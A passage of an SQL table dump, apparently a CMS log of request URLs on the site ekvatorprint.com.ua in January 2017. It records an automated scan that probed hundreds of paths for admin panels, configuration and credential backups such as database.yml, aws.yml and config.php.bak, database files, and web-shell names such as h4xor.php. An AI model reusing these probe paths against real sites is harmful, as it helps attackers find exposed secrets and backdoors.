00:00:00',301),(6141,'http://ekvatorprint.com.ua/cimjobpostadmin',NULL,'','',1,0,'2017-01-20 13:27:57','0000-00-00 00:00:00',301),(6142,'http://ekvatorprint.com.ua/citrix/AccessPlatform/auth/clientscripts/',NULL,'','',1,0,'2017-01-20 13:27:57','0000-00-00 00:00:00',301),(6143,'http://ekvatorprint.com.ua/citrix/AccessPlatform/auth/',NULL,'','',1,0,'2017-01-20 13:27:57','0000-00-00 00:00:00',301),(6144,'http://ekvatorprint.com.ua/city.html',NULL,'','',1,0,'2017-01-20 13:27:57','0000-00-00 00:00:00',301),(6145,'http://ekvatorprint.com.ua/city_admin',NULL,'','',1,0,'2017-01-20 13:27:57','0000-00-00 00:00:00',301),(6146,'http://ekvatorprint.com.ua/cityadmin',NULL,'','',1,0,'2017-01-20 13:27:58','0000-00-00 00:00:00',301),(6147,'http://ekvatorprint.com.ua/cjadmin',NULL,'','',1,0,'2017-01-20 13:27:58','0000-00-00 00:00:00',301),(6148,'http://ekvatorprint.com.ua/ckeditor/',NULL,'','',1,0,'2017-01-20 13:27:58','0000-00-00 00:00:00',301),(6149,'http://ekvatorprint.com.ua/ckeditor',NULL,'','',1,0,'2017-01-20 13:27:58','0000-00-00 00:00:00',301),(6150,'http://ekvatorprint.com.ua/citydesk.xml',NULL,'','',1,0,'2017-01-20 13:27:58','0000-00-00 00:00:00',301),(6151,'http://ekvatorprint.com.ua/ckeditor/ckfinder/ckfinder.html',NULL,'','',1,0,'2017-01-20 13:27:58','0000-00-00 00:00:00',301),(6152,'http://ekvatorprint.com.ua/ckeditor/ckfinder/core/connector/asp/connector.asp',NULL,'','',1,0,'2017-01-20 13:27:58','0000-00-00 00:00:00',301),(6153,'http://ekvatorprint.com.ua/ckeditor/ckfinder/core/connector/php/connector.php',NULL,'','',1,0,'2017-01-20 13:27:58','0000-00-00 00:00:00',301),(6154,'http://ekvatorprint.com.ua/ckeditor/ckfinder/core/connector/aspx/connector.aspx',NULL,'','',1,0,'2017-01-20 13:27:58','0000-00-00 00:00:00',301),(6155,'http://ekvatorprint.com.ua/ckfinder/',NULL,'','',1,0,'2017-01-20 13:27:58','0000-00-00 00:00:00',301),(6156,'http://ekvatorprint.com.ua/classes/',NULL,'','',1,0,'2017-01-20 13:27:58','0000-00-00 00:00:00',301),(6157,'http://ekvatorprint.com.ua/classadmin.',NULL,'','',1,0,'2017-01-20 13:27:58','0000-00-00 00:00:00',301),(6158,'http://ekvatorprint.com.ua/ckfinder/ckfinder.html',NULL,'','',4,0,'2017-01-20 13:27:58','0000-00-00 00:00:00',301),(6159,'http://ekvatorprint.com.ua/classes',NULL,'','',1,0,'2017-01-20 13:27:58','0000-00-00 00:00:00',301),(6160,'http://ekvatorprint.com.ua/class',NULL,'','',1,0,'2017-01-20 13:27:58','0000-00-00 00:00:00',301),(6161,'http://ekvatorprint.com.ua/classes/cookie.txt',NULL,'','',1,0,'2017-01-20 13:27:58','0000-00-00 00:00:00',301),(6162,'http://ekvatorprint.com.ua/classadmin.php',NULL,'','',1,0,'2017-01-20 13:27:58','0000-00-00 00:00:00',301),(6163,'http://ekvatorprint.com.ua/cleanup.log',NULL,'','',1,0,'2017-01-20 13:27:58','0000-00-00 00:00:00',301),(6164,'http://ekvatorprint.com.ua/classifiedadmin',NULL,'','',1,0,'2017-01-20 13:27:58','0000-00-00 00:00:00',301),(6165,'http://ekvatorprint.com.ua/classes/gladius/README.TXT',NULL,'','',1,0,'2017-01-20 13:27:58','0000-00-00 00:00:00',301),(6166,'http://ekvatorprint.com.ua/clear',NULL,'','',1,0,'2017-01-20 13:27:59','0000-00-00 00:00:00',301),(6167,'http://ekvatorprint.com.ua/click',NULL,'','',1,0,'2017-01-20 13:27:59','0000-00-00 00:00:00',301),(6168,'http://ekvatorprint.com.ua/cliente/downloads/h4xor.php',NULL,'','',1,0,'2017-01-20 13:27:59','0000-00-00 00:00:00',301),(6169,'http://ekvatorprint.com.ua/client',NULL,'','',1,0,'2017-01-20 13:27:59','0000-00-00 00:00:00',301),(6170,'http://ekvatorprint.com.ua/client_admin',NULL,'','',1,0,'2017-01-20 13:27:59','0000-00-00 00:00:00',301),(6171,'http://ekvatorprint.com.ua/clients',NULL,'','',1,0,'2017-01-20 13:27:59','0000-00-00 00:00:00',301),(6172,'http://ekvatorprint.com.ua/clientadmin',NULL,'','',1,0,'2017-01-20 13:27:59','0000-00-00 00:00:00',301),(6173,'http://ekvatorprint.com.ua/clients.sql',NULL,'','',1,0,'2017-01-20 13:27:59','0000-00-00 00:00:00',301),(6174,'http://ekvatorprint.com.ua/clients.sqlite',NULL,'','',1,0,'2017-01-20 13:27:59','0000-00-00 00:00:00',301),(6175,'http://ekvatorprint.com.ua/clients.mdb',NULL,'','',1,0,'2017-01-20 13:27:59','0000-00-00 00:00:00',301),(6176,'http://ekvatorprint.com.ua/club_admin.',NULL,'','',1,0,'2017-01-20 13:27:59','0000-00-00 00:00:00',301),(6177,'http://ekvatorprint.com.ua/clients.zip',NULL,'','',1,0,'2017-01-20 13:27:59','0000-00-00 00:00:00',301),(6178,'http://ekvatorprint.com.ua/cm-admin',NULL,'','',1,0,'2017-01-20 13:27:59','0000-00-00 00:00:00',301),(6179,'http://ekvatorprint.com.ua/clientsadmin',NULL,'','',1,0,'2017-01-20 13:27:59','0000-00-00 00:00:00',301),(6180,'http://ekvatorprint.com.ua/club_admin.php',NULL,'','',1,0,'2017-01-20 13:28:00','0000-00-00 00:00:00',301),(6181,'http://ekvatorprint.com.ua/cms',NULL,'','',1,0,'2017-01-20 13:28:00','0000-00-00 00:00:00',301),(6182,'http://ekvatorprint.com.ua/cmdasp.asp',NULL,'','',1,0,'2017-01-20 13:28:00','0000-00-00 00:00:00',301),(6183,'http://ekvatorprint.com.ua/clocktower',NULL,'','',1,0,'2017-01-20 13:28:00','0000-00-00 00:00:00',301),(6184,'http://ekvatorprint.com.ua/cmadmin',NULL,'','',1,0,'2017-01-20 13:28:00','0000-00-00 00:00:00',301),(6185,'http://ekvatorprint.com.ua/cms/Web.config',NULL,'','',1,0,'2017-01-20 13:28:00','0000-00-00 00:00:00',301),(6186,'http://ekvatorprint.com.ua/cms-admin',NULL,'','',1,0,'2017-01-20 13:28:00','0000-00-00 00:00:00',301),(6187,'http://ekvatorprint.com.ua/cmd',NULL,'','',1,0,'2017-01-20 13:28:00','0000-00-00 00:00:00',301),(6188,'http://ekvatorprint.com.ua/cms.csproj',NULL,'','',1,0,'2017-01-20 13:28:00','0000-00-00 00:00:00',301),(6189,'http://ekvatorprint.com.ua/cms/components/login.ascx',NULL,'','',1,0,'2017-01-20 13:28:00','0000-00-00 00:00:00',301),(6190,'http://ekvatorprint.com.ua/cms/themes/cp_themes/default/images/swfupload.swf',NULL,'','',1,0,'2017-01-20 13:28:00','0000-00-00 00:00:00',301),(6191,'http://ekvatorprint.com.ua/cms/themes/cp_themes/default/images/swfupload_f9.swf',NULL,'','',1,0,'2017-01-20 13:28:00','0000-00-00 00:00:00',301),(6192,'http://ekvatorprint.com.ua/cms/design.htm',NULL,'','',1,0,'2017-01-20 13:28:00','0000-00-00 00:00:00',301),(6193,'http://ekvatorprint.com.ua/cms/',NULL,'','',4,0,'2017-01-20 13:28:00','0000-00-00 00:00:00',301),(6194,'http://ekvatorprint.com.ua/cms_admin',NULL,'','',1,0,'2017-01-20 13:28:01','0000-00-00 00:00:00',301),(6195,'http://ekvatorprint.com.ua/cms/cms.csproj',NULL,'','',1,0,'2017-01-20 13:28:01','0000-00-00 00:00:00',301),(6196,'http://ekvatorprint.com.ua/com',NULL,'','',1,0,'2017-01-20 13:28:01','0000-00-00 00:00:00',301),(6197,'http://ekvatorprint.com.ua/cmsample/',NULL,'','',1,0,'2017-01-20 13:28:01','0000-00-00 00:00:00',301),(6198,'http://ekvatorprint.com.ua/com.ibm.ws.console.events',NULL,'','',1,0,'2017-01-20 13:28:01','0000-00-00 00:00:00',301),(6199,'http://ekvatorprint.com.ua/cnt',NULL,'','',1,0,'2017-01-20 13:28:01','0000-00-00 00:00:00',301),(6200,'http://ekvatorprint.com.ua/comment-admin.php',NULL,'','',1,0,'2017-01-20 13:28:01','0000-00-00 00:00:00',301),(6201,'http://ekvatorprint.com.ua/cncat_admin',NULL,'','',1,0,'2017-01-20 13:28:01','0000-00-00 00:00:00',301),(6202,'http://ekvatorprint.com.ua/cmsadmin',NULL,'','',1,0,'2017-01-20 13:28:01','0000-00-00 00:00:00',301),(6203,'http://ekvatorprint.com.ua/codeception.yml',NULL,'','',1,0,'2017-01-20 13:28:01','0000-00-00 00:00:00',301),(6204,'http://ekvatorprint.com.ua/code',NULL,'','',1,0,'2017-01-20 13:28:01','0000-00-00 00:00:00',301),(6205,'http://ekvatorprint.com.ua/comments',NULL,'','',1,0,'2017-01-20 13:28:01','0000-00-00 00:00:00',301),(6206,'http://ekvatorprint.com.ua/columns',NULL,'','',1,0,'2017-01-20 13:28:01','0000-00-00 00:00:00',301),(6207,'http://ekvatorprint.com.ua/comment-admin.',NULL,'','',1,0,'2017-01-20 13:28:01','0000-00-00 00:00:00',301),(6208,'http://ekvatorprint.com.ua/community',NULL,'','',1,0,'2017-01-20 13:28:02','0000-00-00 00:00:00',301),(6209,'http://ekvatorprint.com.ua/comment',NULL,'','',1,0,'2017-01-20 13:28:02','0000-00-00 00:00:00',301),(6210,'http://ekvatorprint.com.ua/comadmin',NULL,'','',1,0,'2017-01-20 13:28:02','0000-00-00 00:00:00',301),(6211,'http://ekvatorprint.com.ua/com.ibm.ws.console.events/runtime_messages.jsp',NULL,'','',1,0,'2017-01-20 13:28:02','0000-00-00 00:00:00',301),(6212,'http://ekvatorprint.com.ua/compadmin',NULL,'','',1,0,'2017-01-20 13:28:02','0000-00-00 00:00:00',301),(6213,'http://ekvatorprint.com.ua/common.xml',NULL,'','',1,0,'2017-01-20 13:28:02','0000-00-00 00:00:00',301),(6214,'http://ekvatorprint.com.ua/common/config/db.ini',NULL,'','',1,0,'2017-01-20 13:28:02','0000-00-00 00:00:00',301),(6215,'http://ekvatorprint.com.ua/common',NULL,'','',1,0,'2017-01-20 13:28:02','0000-00-00 00:00:00',301),(6216,'http://ekvatorprint.com.ua/common/config/api.ini',NULL,'','',1,0,'2017-01-20 13:28:02','0000-00-00 00:00:00',301),(6217,'http://ekvatorprint.com.ua/common.inc',NULL,'','',1,0,'2017-01-20 13:28:02','0000-00-00 00:00:00',301),(6218,'http://ekvatorprint.com.ua/compass/logon.jsp',NULL,'','',1,0,'2017-01-20 13:28:02','0000-00-00 00:00:00',301),(6219,'http://ekvatorprint.com.ua/conf',NULL,'','',1,0,'2017-01-20 13:28:02','0000-00-00 00:00:00',301),(6220,'http://ekvatorprint.com.ua/components/login.ascx',NULL,'','',1,0,'2017-01-20 13:28:02','0000-00-00 00:00:00',301),(6221,'http://ekvatorprint.com.ua/component',NULL,'','',1,0,'2017-01-20 13:28:02','0000-00-00 00:00:00',301),(6222,'http://ekvatorprint.com.ua/compat',NULL,'','',1,0,'2017-01-20 13:28:02','0000-00-00 00:00:00',301),(6223,'http://ekvatorprint.com.ua/company',NULL,'','',1,0,'2017-01-20 13:28:02','0000-00-00 00:00:00',301),(6224,'http://ekvatorprint.com.ua/composer.json',NULL,'','',1,0,'2017-01-20 13:28:02','0000-00-00 00:00:00',301),(6225,'http://ekvatorprint.com.ua/concrete/config/banned_words.txt',NULL,'','',1,0,'2017-01-20 13:28:02','0000-00-00 00:00:00',301),(6226,'http://ekvatorprint.com.ua/conf/',NULL,'','',1,0,'2017-01-20 13:28:02','0000-00-00 00:00:00',301),(6227,'http://ekvatorprint.com.ua/conf.html',NULL,'','',1,0,'2017-01-20 13:28:02','0000-00-00 00:00:00',301),(6228,'http://ekvatorprint.com.ua/composer.lock',NULL,'','',1,0,'2017-01-20 13:28:02','0000-00-00 00:00:00',301),(6229,'http://ekvatorprint.com.ua/composer.phar',NULL,'','',1,0,'2017-01-20 13:28:03','0000-00-00 00:00:00',301),(6230,'http://ekvatorprint.com.ua/config.',NULL,'','',2,0,'2017-01-20 13:28:03','0000-00-00 00:00:00',301),(6231,'http://ekvatorprint.com.ua/conf/server.xml',NULL,'','',1,0,'2017-01-20 13:28:03','0000-00-00 00:00:00',301),(6232,'http://ekvatorprint.com.ua/config',NULL,'','',2,0,'2017-01-20 13:28:03','0000-00-00 00:00:00',301),(6233,'http://ekvatorprint.com.ua/config.core',NULL,'','',1,0,'2017-01-20 13:28:03','0000-00-00 00:00:00',301),(6234,'http://ekvatorprint.com.ua/config.codekit',NULL,'','',1,0,'2017-01-20 13:28:03','0000-00-00 00:00:00',301),(6235,'http://ekvatorprint.com.ua/config.inc.bak',NULL,'','',1,0,'2017-01-20 13:28:03','0000-00-00 00:00:00',301),(6236,'http://ekvatorprint.com.ua/config.bak',NULL,'','',4,0,'2017-01-20 13:28:03','0000-00-00 00:00:00',301),(6237,'http://ekvatorprint.com.ua/config.inc',NULL,'','',2,0,'2017-01-20 13:28:03','0000-00-00 00:00:00',301),(6238,'http://ekvatorprint.com.ua/config.dat',NULL,'','',2,0,'2017-01-20 13:28:03','0000-00-00 00:00:00',301),(6239,'http://ekvatorprint.com.ua/conferences',NULL,'','',1,0,'2017-01-20 13:28:03','0000-00-00 00:00:00',301),(6240,'http://ekvatorprint.com.ua/config.ini',NULL,'','',1,0,'2017-01-20 13:28:03','0000-00-00 00:00:00',301),(6241,'http://ekvatorprint.com.ua/config.inc.php',NULL,'','',2,0,'2017-01-20 13:28:03','0000-00-00 00:00:00',301),(6242,'http://ekvatorprint.com.ua/config.inc.txt',NULL,'','',1,0,'2017-01-20 13:28:03','0000-00-00 00:00:00',301),(6243,'http://ekvatorprint.com.ua/config.inc~',NULL,'','',1,0,'2017-01-20 13:28:03','0000-00-00 00:00:00',301),(6244,'http://ekvatorprint.com.ua/config.json.cfm',NULL,'','',1,0,'2017-01-20 13:28:03','0000-00-00 00:00:00',301),(6245,'http://ekvatorprint.com.ua/config.inc.php~',NULL,'','',1,0,'2017-01-20 13:28:03','0000-00-00 00:00:00',301),(6246,'http://ekvatorprint.com.ua/config.ini.bak',NULL,'','',1,0,'2017-01-20 13:28:03','0000-00-00 00:00:00',301),(6247,'http://ekvatorprint.com.ua/config.inc.php.txt',NULL,'','',1,0,'2017-01-20 13:28:03','0000-00-00 00:00:00',301),(6248,'http://ekvatorprint.com.ua/config.ini.old',NULL,'','',1,0,'2017-01-20 13:28:03','0000-00-00 00:00:00',301),(6249,'http://ekvatorprint.com.ua/config.ini.txt',NULL,'','',1,0,'2017-01-20 13:28:03','0000-00-00 00:00:00',301),(6250,'http://ekvatorprint.com.ua/config.old',NULL,'','',2,0,'2017-01-20 13:28:03','0000-00-00 00:00:00',301),(6251,'http://ekvatorprint.com.ua/config.local',NULL,'','',2,0,'2017-01-20 13:28:04','0000-00-00 00:00:00',301),(6252,'http://ekvatorprint.com.ua/config.php.inc',NULL,'','',1,0,'2017-01-20 13:28:04','0000-00-00 00:00:00',301),(6253,'http://ekvatorprint.com.ua/config.json',NULL,'','',1,0,'2017-01-20 13:28:04','0000-00-00 00:00:00',301),(6254,'http://ekvatorprint.com.ua/config.php-eb',NULL,'','',1,0,'2017-01-20 13:28:04','0000-00-00 00:00:00',301),(6255,'http://ekvatorprint.com.ua/config.php.bak',NULL,'','',3,0,'2017-01-20 13:28:04','0000-00-00 00:00:00',301),(6256,'http://ekvatorprint.com.ua/config.php~',NULL,'','',4,0,'2017-01-20 13:28:04','0000-00-00 00:00:00',301),(6257,'http://ekvatorprint.com.ua/config.php.dist',NULL,'','',1,0,'2017-01-20 13:28:04','0000-00-00 00:00:00',301),(6258,'http://ekvatorprint.com.ua/config.php.inc~',NULL,'','',1,0,'2017-01-20 13:28:04','0000-00-00 00:00:00',301),(6259,'http://ekvatorprint.com.ua/config.php.save',NULL,'','',2,0,'2017-01-20 13:28:04','0000-00-00 00:00:00',301),(6260,'http://ekvatorprint.com.ua/config.php.old',NULL,'','',2,0,'2017-01-20 13:28:04','0000-00-00 00:00:00',301),(6261,'http://ekvatorprint.com.ua/config.php.swp',NULL,'','',2,0,'2017-01-20 13:28:04','0000-00-00 00:00:00',301),(6262,'http://ekvatorprint.com.ua/config.rb',NULL,'','',1,0,'2017-01-20 13:28:04','0000-00-00 00:00:00',301),(6263,'http://ekvatorprint.com.ua/config.php.txt',NULL,'','',2,0,'2017-01-20 13:28:04','0000-00-00 00:00:00',301),(6264,'http://ekvatorprint.com.ua/config.xml',NULL,'','',1,0,'2017-01-20 13:28:04','0000-00-00 00:00:00',301),(6265,'http://ekvatorprint.com.ua/config.txt',NULL,'','',2,0,'2017-01-20 13:28:04','0000-00-00 00:00:00',301),(6266,'http://ekvatorprint.com.ua/config/banned_words.txt',NULL,'','',1,0,'2017-01-20 13:28:04','0000-00-00 00:00:00',301),(6267,'http://ekvatorprint.com.ua/config/',NULL,'','',4,0,'2017-01-20 13:28:04','0000-00-00 00:00:00',301),(6268,'http://ekvatorprint.com.ua/config/apc.php',NULL,'','',1,0,'2017-01-20 13:28:04','0000-00-00 00:00:00',301),(6269,'http://ekvatorprint.com.ua/config/AppData.config',NULL,'','',1,0,'2017-01-20 13:28:04','0000-00-00 00:00:00',301),(6270,'http://ekvatorprint.com.ua/config/aws.yml',NULL,'','',1,0,'2017-01-20 13:28:04','0000-00-00 00:00:00',301),(6271,'http://ekvatorprint.com.ua/config.yml',NULL,'','',1,0,'2017-01-20 13:28:04','0000-00-00 00:00:00',301),(6272,'http://ekvatorprint.com.ua/config/database.yml',NULL,'','',2,0,'2017-01-20 13:28:04','0000-00-00 00:00:00',301),(6273,'http://ekvatorprint.com.ua/config/app.yml',NULL,'','',1,0,'2017-01-20 13:28:04','0000-00-00 00:00:00',301),(6274,'http://ekvatorprint.com.ua/config/database.yml_original',NULL,'','',1,0,'2017-01-20 13:28:04','0000-00-00 00:00:00',301),(6275,'http://ekvatorprint.com.ua/config/config.ini',NULL,'','',1,0,'2017-01-20 13:28:05','0000-00-00 00:00:00',301),(6276,'http://ekvatorprint.com.ua/config/database.yml.pgsql',NULL,'','',1,0,'2017-01-20 13:28:05','0000-00-00 00:00:00',301),(6277,'http://ekvatorprint.com.ua/config/monkdonate.ini',NULL,'','',1,0,'2017-01-20 13:28:05','0000-00-00 00:00:00',301),(6278,'http://ekvatorprint.com.ua/config/database.yml.sqlite3',NULL,'','',1,0,'2017-01-20 13:28:05','0000-00-00 00:00:00',301),(6279,'http://ekvatorprint.com.ua/config/monkcheckout.ini',NULL,'','',1,0,'2017-01-20 13:28:05','0000-00-00 00:00:00',301),(6280,'http://ekvatorprint.com.ua/config/databases.yml',NULL,'','',1,0,'2017-01-20 13:28:05','0000-00-00 00:00:00',301),(6281,'http://ekvatorprint.com.ua/config/database.yml~',NULL,'','',1,0,'2017-01-20 13:28:05','0000-00-00 00:00:00',301),(6282,'http://ekvatorprint.com.ua/config/settings.inc',NULL,'','',1,0,'2017-01-20 13:28:05','0000-00-00 00:00:00',301),(6283,'http://ekvatorprint.com.ua/config/monkid.ini',NULL,'','',1,0,'2017-01-20 13:28:05','0000-00-00 00:00:00',301),(6284,'http://ekvatorprint.com.ua/config/producao.ini',NULL,'','',1,0,'2017-01-20 13:28:05','0000-00-00 00:00:00',301),(6285,'http://ekvatorprint.com.ua/config/routes.yml',NULL,'','',1,0,'2017-01-20 13:28:05','0000-00-00 00:00:00',301),(6286,'http://ekvatorprint.com.ua/config/settings.ini',NULL,'','',1,0,'2017-01-20 13:28:05','0000-00-00 00:00:00',301),(6287,'http://ekvatorprint.com.ua/config/settings/production.yml',NULL,'','',1,0,'2017-01-20 13:28:05','0000-00-00 00:00:00',301),(6288,'http://ekvatorprint.com.ua/config/settings.local.yml',NULL,'','',1,0,'2017-01-20 13:28:05','0000-00-00 00:00:00',301),(6289,'http://ekvatorprint.com.ua/config/settings.ini.cfm',NULL,'','',1,0,'2017-01-20 13:28:05','0000-00-00 00:00:00',301),(6290,'http://ekvatorprint.com.ua/configs/conf_bdd.ini',NULL,'','',1,0,'2017-01-20 13:28:05','0000-00-00 00:00:00',301),(6291,'http://ekvatorprint.com.ua/configuration.ini',NULL,'','',1,0,'2017-01-20 13:28:05','0000-00-00 00:00:00',301),(6292,'http://ekvatorprint.com.ua/configuration.php.save',NULL,'','',3,0,'2017-01-20 13:28:05','0000-00-00 00:00:00',301),(6293,'http://ekvatorprint.com.ua/configuration.php.dist',NULL,'','',1,0,'2017-01-20 13:28:05','0000-00-00 00:00:00',301),(6294,'http://ekvatorprint.com.ua/configuration.php.txt',NULL,'','',3,0,'2017-01-20 13:28:05','0000-00-00 00:00:00',301),(6295,'http://ekvatorprint.com.ua/configuration.php.swp',NULL,'','',2,0,'2017-01-20 13:28:05','0000-00-00 00:00:00',301),(6296,'http://ekvatorprint.com.ua/configuration/',NULL,'','',2,0,'2017-01-20 13:28:05','0000-00-00 00:00:00',301),(6297,'http://ekvatorprint.com.ua/confirmation.',NULL,'','',1,0,'2017-01-20 13:28:06','0000-00-00 00:00:00',301),(6298,'http://ekvatorprint.com.ua/confluence/',NULL,'','',1,0,'2017-01-20 13:28:06','0000-00-00 00:00:00',301),(6299,'http://ekvatorprint.com.ua/confirmation.php',NULL,'','',1,0,'2017-01-20 13:28:06','0000-00-00 00:00:00',301),(6300,'http://ekvatorprint.com.ua/connect.inc',NULL,'','',1,0,'2017-01-20 13:28:06','0000-00-00 00:00:00',301),(6301,'http://ekvatorprint.com.ua/console/base/config.json',NULL,'','',1,0,'2017-01-20 13:28:06','0000-00-00 00:00:00',301),(6302,'http://ekvatorprint.com.ua/console/',NULL,'','',1,0,'2017-01-20 13:28:06','0000-00-00 00:00:00',301),(6303,'http://ekvatorprint.com.ua/console',NULL,'','',3,0,'2017-01-20 13:28:06','0000-00-00 00:00:00',301),(6304,'http://ekvatorprint.com.ua/console/j_security_check',NULL,'','',1,0,'2017-01-20 13:28:06','0000-00-00 00:00:00',301),(6305,'http://ekvatorprint.com.ua/console/payments/config.json',NULL,'','',1,0,'2017-01-20 13:28:06','0000-00-00 00:00:00',301),(6306,'http://ekvatorprint.com.ua/consumer',NULL,'','',1,0,'2017-01-20 13:28:06','0000-00-00 00:00:00',301),(6307,'http://ekvatorprint.com.ua/contact_admin.php',NULL,'','',1,0,'2017-01-20 13:28:06','0000-00-00 00:00:00',301),(6308,'http://ekvatorprint.com.ua/contact_admin.',NULL,'','',1,0,'2017-01-20 13:28:06','0000-00-00 00:00:00',301),(6309,'http://ekvatorprint.com.ua/contactus',NULL,'','',2,0,'2017-01-20 13:28:06','0000-00-00 00:00:00',301),(6310,'http://ekvatorprint.com.ua/contact_us',NULL,'','',1,0,'2017-01-20 13:28:06','0000-00-00 00:00:00',301),(6311,'http://ekvatorprint.com.ua/config.inc.old',NULL,'','',1,0,'2017-01-20 13:28:06','0000-00-00 00:00:00',301),(6312,'http://ekvatorprint.com.ua/contactus.php',NULL,'','',1,0,'2017-01-20 13:28:06','0000-00-00 00:00:00',301),(6313,'http://ekvatorprint.com.ua/contactus.',NULL,'','',1,0,'2017-01-20 13:28:06','0000-00-00 00:00:00',301),(6314,'http://ekvatorprint.com.ua/content.php',NULL,'','',1,0,'2017-01-20 13:28:06','0000-00-00 00:00:00',301),(6315,'http://ekvatorprint.com.ua/content',NULL,'','',1,0,'2017-01-20 13:28:06','0000-00-00 00:00:00',301),(6316,'http://ekvatorprint.com.ua/contributing.md',NULL,'','',1,0,'2017-01-20 13:28:06','0000-00-00 00:00:00',301),(6317,'http://ekvatorprint.com.ua/content.',NULL,'','',1,0,'2017-01-20 13:28:07','0000-00-00 00:00:00',301),(6318,'http://ekvatorprint.com.ua/content_admin',NULL,'','',1,0,'2017-01-20 13:28:07','0000-00-00 00:00:00',301),(6319,'http://ekvatorprint.com.ua/content/debug.log',NULL,'','',1,0,'2017-01-20 13:28:07','0000-00-00 00:00:00',301),(6320,'http://ekvatorprint.com.ua/controller',NULL,'','',1,0,'2017-01-20 13:28:07','0000-00-00 00:00:00',301),(6321,'http://ekvatorprint.com.ua/contents',NULL,'','',1,0,'2017-01-20 13:28:07','0000-00-00 00:00:00',301),(6322,'http://ekvatorprint.com.ua/controlpanel',NULL,'','',1,0,'2017-01-20 13:28:07','0000-00-00 00:00:00',301),(6323,'http://ekvatorprint.com.ua/contributors.txt',NULL,'','',1,0,'2017-01-20 13:28:07','0000-00-00 00:00:00',301),(6324,'http://ekvatorprint.com.ua/contentadmin',NULL,'','',1,0,'2017-01-20 13:28:07','0000-00-00 00:00:00',301),(6325,'http://ekvatorprint.com.ua/contributor',NULL,'','',1,0,'2017-01-20 13:28:07','0000-00-00 00:00:00',301),(6326,'http://ekvatorprint.com.ua/controlpanel.php',NULL,'','',2,0,'2017-01-20 13:28:07','0000-00-00 00:00:00',301),(6327,'http://ekvatorprint.com.ua/controlpanel.',NULL,'','',1,0,'2017-01-20 13:28:07','0000-00-00 00:00:00',301),(6328,'http://ekvatorprint.com.ua/controlpanel.html',NULL,'','',1,0,'2017-01-20 13:28:07','0000-00-00 00:00:00',301),(6329,'http://ekvatorprint.com.ua/controlpanel.htm',NULL,'','',1,0,'2017-01-20 13:28:07','0000-00-00 00:00:00',301),(6330,'http://ekvatorprint.com.ua/cookies',NULL,'','',1,0,'2017-01-20 13:28:07','0000-00-00 00:00:00',301),(6331,'http://ekvatorprint.com.ua/corporate',NULL,'','',1,0,'2017-01-20 13:28:07','0000-00-00 00:00:00',301),(6332,'http://ekvatorprint.com.ua/controlpanel.shtml',NULL,'','',1,0,'2017-01-20 13:28:08','0000-00-00 00:00:00',301),(6333,'http://ekvatorprint.com.ua/coppermine',NULL,'','',1,0,'2017-01-20 13:28:08','0000-00-00 00:00:00',301),(6334,'http://ekvatorprint.com.ua/coverage.data',NULL,'','',1,0,'2017-01-20 13:28:08','0000-00-00 00:00:00',301),(6335,'http://ekvatorprint.com.ua/copyright',NULL,'','',1,0,'2017-01-20 13:28:08','0000-00-00 00:00:00',301),(6336,'http://ekvatorprint.com.ua/core',NULL,'','',1,0,'2017-01-20 13:28:08','0000-00-00 00:00:00',301),(6337,'http://ekvatorprint.com.ua/counter',NULL,'','',1,0,'2017-01-20 13:28:08','0000-00-00 00:00:00',301),(6338,'http://ekvatorprint.com.ua/core/fragments/moduleInfo.phtml',NULL,'','',1,0,'2017-01-20 13:28:08','0000-00-00 00:00:00',301),(6339,'http://ekvatorprint.com.ua/cp/',NULL,'','',1,0,'2017-01-20 13:28:08','0000-00-00 00:00:00',301),(6340,'http://ekvatorprint.com.ua/coverage.xml',NULL,'','',1,0,'2017-01-20 13:28:08','0000-00-00 00:00:00',301),(6341,'http://ekvatorprint.com.ua/coupons_admin_cp',NULL,'','',1,0,'2017-01-20 13:28:08','0000-00-00 00:00:00',301),(6342,'http://ekvatorprint.com.ua/cp',NULL,'','',1,0,'2017-01-20 13:28:08','0000-00-00 00:00:00',301),(6343,'http://ekvatorprint.com.ua/configs/conf_zepass.ini',NULL,'','',1,0,'2017-01-20 13:28:08','0000-00-00 00:00:00',301),(6344,'http://ekvatorprint.com.ua/cowadmin',NULL,'','',1,0,'2017-01-20 13:28:08','0000-00-00 00:00:00',301),(6345,'http://ekvatorprint.com.ua/cp.php',NULL,'','',3,0,'2017-01-20 13:28:08','0000-00-00 00:00:00',301),(6346,'http://ekvatorprint.com.ua/cp.',NULL,'','',1,0,'2017-01-20 13:28:08','0000-00-00 00:00:00',301),(6347,'http://ekvatorprint.com.ua/cpanel/',NULL,'','',1,0,'2017-01-20 13:28:08','0000-00-00 00:00:00',301),(6348,'http://ekvatorprint.com.ua/cpn.php',NULL,'','',1,0,'2017-01-20 13:28:08','0000-00-00 00:00:00',301),(6349,'http://ekvatorprint.com.ua/cpadmin',NULL,'','',1,0,'2017-01-20 13:28:09','0000-00-00 00:00:00',301),(6350,'http://ekvatorprint.com.ua/cp.html',NULL,'','',1,0,'2017-01-20 13:28:09','0000-00-00 00:00:00',301),(6351,'http://ekvatorprint.com.ua/cpbackup-exclude.conf',NULL,'','',1,0,'2017-01-20 13:28:09','0000-00-00 00:00:00',301),(6352,'http://ekvatorprint.com.ua/cpsadmin',NULL,'','',1,0,'2017-01-20 13:28:09','0000-00-00 00:00:00',301),(6353,'http://ekvatorprint.com.ua/cpanel.php',NULL,'','',2,0,'2017-01-20 13:28:09','0000-00-00 00:00:00',301),(6354,'http://ekvatorprint.com.ua/cpanel',NULL,'','',2,0,'2017-01-20 13:28:09','0000-00-00 00:00:00',301),(6355,'http://ekvatorprint.com.ua/cpg',NULL,'','',1,0,'2017-01-20 13:28:09','0000-00-00 00:00:00',301),(6356,'http://ekvatorprint.com.ua/crm/',NULL,'','',1,0,'2017-01-20 13:28:09','0000-00-00 00:00:00',301),(6357,'http://ekvatorprint.com.ua/crack',NULL,'','',1,0,'2017-01-20 13:28:09','0000-00-00 00:00:00',301),(6358,'http://ekvatorprint.com.ua/cpbt.php',NULL,'','',1,0,'2017-01-20 13:28:09','0000-00-00 00:00:00',301),(6359,'http://ekvatorprint.com.ua/creo_admin',NULL,'','',1,0,'2017-01-20 13:28:09','0000-00-00 00:00:00',301),(6360,'http://ekvatorprint.com.ua/cron.sh',NULL,'','',1,0,'2017-01-20 13:28:09','0000-00-00 00:00:00',301),(6361,'http://ekvatorprint.com.ua/crond/logs/',NULL,'','',1,0,'2017-01-20 13:28:09','0000-00-00 00:00:00',301),(6362,'http://ekvatorprint.com.ua/crownadmin',NULL,'','',1,0,'2017-01-20 13:28:09','0000-00-00 00:00:00',301),(6363,'http://ekvatorprint.com.ua/cron.log',NULL,'','',1,0,'2017-01-20 13:28:09','0000-00-00 